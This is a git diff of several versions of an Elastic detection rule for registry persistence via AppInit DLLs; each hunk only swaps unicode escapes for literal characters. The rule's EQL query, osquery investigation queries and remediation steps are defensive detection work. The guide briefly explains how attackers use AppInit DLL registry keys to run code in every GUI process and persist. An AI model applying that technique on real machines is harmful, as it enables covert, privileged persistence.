Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json index ac950555abe..8476ecb241f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", 
@@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json index 15f5213367a..a421d8b01d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json index 2904ac318de..e5781199b3a 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_106.json 
